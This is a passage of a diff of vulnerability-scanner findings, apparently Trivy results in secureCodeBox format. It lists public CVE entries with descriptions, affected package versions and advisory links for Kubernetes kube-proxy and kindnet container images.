"https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", - ], - }, - "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://security.netapp.com/advisory/ntap-20210304-0007/", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=27256", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=7d88c6142c6efc160c0ee5e4f85cde382c072888", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://sourceware.org/pipermail/libc-alpha/2021-January/122058.html", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://ubuntu.com/security/notices/USN-5699-1", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3326", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://www.oracle.com/security-alerts/cpujan2022.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.28-10", + "packageName": "libc6", + "references": [ + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", + ], + }, + "category": "Vulnerability", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "mitigation": undefined, + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", + "references": [ { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libgssapi-krb5-2", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2016-10228", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "http://openwall.com/lists/oss-security/2017/03/01/10", + "http://www.securityfocus.com/bid/96525", + "https://access.redhat.com/security/cve/CVE-2016-10228", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", + "https://linux.oracle.com/cve/CVE-2016-10228.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", + "https://security.gentoo.org/glsa/202101-20", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", + "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", + "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2016-10228", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv program in the GNU C Library (aka glibc or libc6) 2.31 and earlier, when invoked with multiple suffixes in the destination encoding (TRANSLATE or IGNORE) along with the -c option, enters an infinite loop when processing invalid multi-byte input sequences, leading to a denial of service.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: iconv program can hang when invoked with the -c option", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", + "value": "https://avd.aquasec.com/nvd/cve-2016-10228", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", + "value": "http://openwall.com/lists/oss-security/2017/03/01/10", }, { "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", + "value": "http://www.securityfocus.com/bid/96525", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "value": "https://access.redhat.com/security/cve/CVE-2016-10228", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10228", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "value": "https://linux.oracle.com/cve/CVE-2016-10228.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libip4tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2016-10228", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://security.gentoo.org/glsa/202101-20", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2012-2663", - "installedVersion": "1.8.7-1", - "packageName": "libip6tc2", - "references": [ - "http://www.spinics.net/lists/netfilter-devel/msg21248.html", - "https://access.redhat.com/security/cve/CVE-2012-2663", - "https://bugzilla.redhat.com/show_bug.cgi?id=826702", - "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", - "https://www.cve.org/CVERecord?id=CVE-2012-2663", - ], - }, - "category": "Vulnerability", - "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", - "mitigation": undefined, - "name": "iptables: --syn flag bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2012-2663", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=19519#c21", }, { "type": "URL", - "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=26224", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2012-2663", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "value": "https://www.cve.org/CVERecord?id=CVE-2016-10228", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": "1.18.3-6+deb11u3", - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-42898", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-25013", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8637", - "https://access.redhat.com/security/cve/CVE-2022-42898", - "https://bugzilla.redhat.com/2140960", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", - "https://bugzilla.samba.org/show_bug.cgi?id=15203", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", - "https://errata.almalinux.org/9/ALSA-2022-8637.html", - "https://errata.rockylinux.org/RLSA-2022:8637", - "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", - "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", - "https://linux.oracle.com/cve/CVE-2022-42898.html", - "https://linux.oracle.com/errata/ELSA-2023-12104.html", - "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", - "https://security.netapp.com/advisory/ntap-20230216-0008/", - "https://security.netapp.com/advisory/ntap-20230223-0001/", - "https://ubuntu.com/security/notices/USN-5800-1", - "https://ubuntu.com/security/notices/USN-5822-1", - "https://ubuntu.com/security/notices/USN-5822-2", - "https://ubuntu.com/security/notices/USN-5828-1", - "https://ubuntu.com/security/notices/USN-5936-1", - "https://web.mit.edu/kerberos/advisories/", - "https://web.mit.edu/kerberos/krb5-1.19/", - "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", - "https://www.cve.org/CVERecord?id=CVE-2022-42898", - "https://www.samba.org/samba/security/CVE-2022-42898.html", + "https://access.redhat.com/security/cve/CVE-2019-25013", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", + "https://linux.oracle.com/cve/CVE-2019-25013.html", + "https://linux.oracle.com/errata/ELSA-2021-9344.html", + "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", + "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", + "https://security.gentoo.org/glsa/202107-07", + "https://security.netapp.com/advisory/ntap-20210205-0004/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", + "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5768-1", + "https://www.cve.org/CVERecord?id=CVE-2019-25013", + "https://www.oracle.com/security-alerts/cpuapr2022.html", ], }, "category": "Vulnerability", - "description": "PAC parsing in MIT Kerberos 5 (aka krb5) before 1.19.4 and 1.20.x before 1.20.1 has integer overflows that may lead to remote code execution (in KDC, kadmind, or a GSS or Kerberos application server) on 32-bit platforms (which have a resultant heap-based buffer overflow), and cause a denial of service on other platforms. This occurs in krb5_pac_parse in lib/krb5/krb/pac.c. Heimdal before 7.7.1 has "a similar bug."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The iconv feature in the GNU C Library (aka glibc or libc6) through 2.32, when processing invalid multi-byte input sequences in the EUC-KR encoding, may have a buffer over-read.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "integer overflow vulnerabilities in PAC parsing", + "name": "glibc: buffer over-read in iconv when processing invalid multi-byte input sequences in the EUC-KR encoding", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-42898", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8637", + "value": "https://avd.aquasec.com/nvd/cve-2019-25013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-42898", + "value": "https://access.redhat.com/security/cve/CVE-2019-25013", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140960", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-25013", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140960", + "value": "https://linux.oracle.com/cve/CVE-2019-25013.html", }, { "type": "URL", - "value": "https://bugzilla.samba.org/show_bug.cgi?id=15203", + "value": "https://linux.oracle.com/errata/ELSA-2021-9344.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42898", + "value": "https://lists.apache.org/thread.html/r32d767ac804e9b8aad4355bb85960a6a1385eab7afff549a5e98660f@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8637.html", + "value": "https://lists.apache.org/thread.html/r448bb851cc8e6e3f93f3c28c70032b37062625d81214744474ac49e7@%3Cdev.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8637", + "value": "https://lists.apache.org/thread.html/r4806a391091e082bdea17266452ca656ebc176e51bb3932733b3a0a2@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/heimdal/heimdal/security/advisories/GHSA-64mq-fvfj-5x3c", + "value": "https://lists.apache.org/thread.html/r499e4f96d0b5109ef083f2feccd33c51650c1b7d7068aa3bd47efca9@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/krb5/krb5/commit/ea92d2f0fcceb54a70910fa32e9a0d7a5afc3583", + "value": "https://lists.apache.org/thread.html/r5af4430421bb6f9973294691a7904bbd260937e9eef96b20556f43ff@%3Cjira.kafka.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-42898.html", + "value": "https://lists.apache.org/thread.html/r750eee18542bc02bd8350861c424ee60a9b9b225568fa09436a37ece@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-12104.html", + "value": "https://lists.apache.org/thread.html/r7a2e94adfe0a2f0a1d42e4927e8c32ecac97d37db9cb68095fe9ddbc@%3Cdev.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://mailman.mit.edu/pipermail/krbdev/2022-November/013576.html", + "value": "https://lists.apache.org/thread.html/rd2354f9ccce41e494fbadcbc5ad87218de6ec0fff8a7b54c8462226c@%3Cissues.zookeeper.apache.org%3E", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-42898", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230216-0008/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230223-0001/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4Y6TX47P47KABSFOL26FLDNVCWXDKDEZ/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5800-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TVCUNLQ3HXGS4VPUQKWTJGRAW2KTFGXS/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-25013", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5822-2", + "value": "https://security.gentoo.org/glsa/202107-07", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5828-1", + "value": "https://security.netapp.com/advisory/ntap-20210205-0004/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5936-1", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24973", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/advisories/", + "value": "https://sourceware.org/git/?p=glibc.git;a=commit;h=ee7a3144c9922808181009b7b3e50e852fb4999b", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.19/", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://web.mit.edu/kerberos/krb5-1.20/README-1.20.1.txt", + "value": "https://ubuntu.com/security/notices/USN-5768-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-42898", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-25013", }, { "type": "URL", - "value": "https://www.samba.org/samba/security/CVE-2022-42898.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, ], - "severity": "HIGH", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-5709", - "installedVersion": "1.18.3-6+deb11u1", - "packageName": "libk5crypto3", + "fixedVersion": "2.28-10+deb10u2", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-10029", + "installedVersion": "2.28-10", + "packageName": "libc6", "references": [ - "https://access.redhat.com/security/cve/CVE-2018-5709", - "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - "https://www.cve.org/CVERecord?id=CVE-2018-5709", + "http://lists.opensuse.org/opensuse-security-announce/2020-03/msg00033.html", + "https://access.redhat.com/security/cve/CVE-2020-10029", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10029", + "https://linux.oracle.com/cve/CVE-2020-10029.html", + "https://linux.oracle.com/errata/ELSA-2021-0348.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/23N76M3EDP2GIW4GOIQRYTKRE7PPBRB2/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZTFUD5VH2GU3YOXA2KBQSBIDZRDWNZ3/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VU5JJGENOK7K4X5RYAA5PL647C6HD22E/", + "https://nvd.nist.gov/vuln/detail/CVE-2020-10029", + "https://security.gentoo.org/glsa/202006-04", + "https://security.netapp.com/advisory/ntap-20200327-0003/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=25487", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git;a=commit;h=9333498794cde1d5cca518badf79533a24114b6f", + "https://ubuntu.com/security/notices/USN-4416-1", + "https://usn.ubuntu.com/4416-1/", + "https://www.cve.org/CVERecord?id=CVE-2020-10029", ], }, "category": "Vulnerability", - "description": "An issue was discovered in MIT Kerberos 5 (aka krb5) through 1.16. There is a variable "dbentry->n_key_data" in kadmin/dbutil/dump.c that can store 16-bit data but unknowingly the developer has assigned a "u4" variable to it, which is for 32-bit data. An attacker can use this vulnerability to affect other artifacts of the database as we know that a Kerberos database dump file contains trusted data.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "description": "The GNU C Library (aka glibc or libc6) before 2.32 could overflow an on-stack buffer during range reduction if an input to an 80-bit long double function contains a non-canonical bit pattern, a seen when passing a 0x5d414141414141410000 value to sinl on x86 targets. This is related to sysdeps/ieee754/ldbl-96/e_rem_pio2l.c.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "krb5: integer overflow in dbentry->n_key_data in kadmin/dbutil/dump.c", + "name": "glibc: stack corruption from crafted input in cosl, sinl, sincosl, and tanl functions", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-5709", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-5709", - }, - { - "type": "URL", - "value": "https://github.com/poojamnit/Kerberos-V5-1.16-Vulnerabilities/tree/master/Integer%20Overflow", - }, - { - "type": "URL", - "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-5709", - }, - { - "type": "URL", - "value": 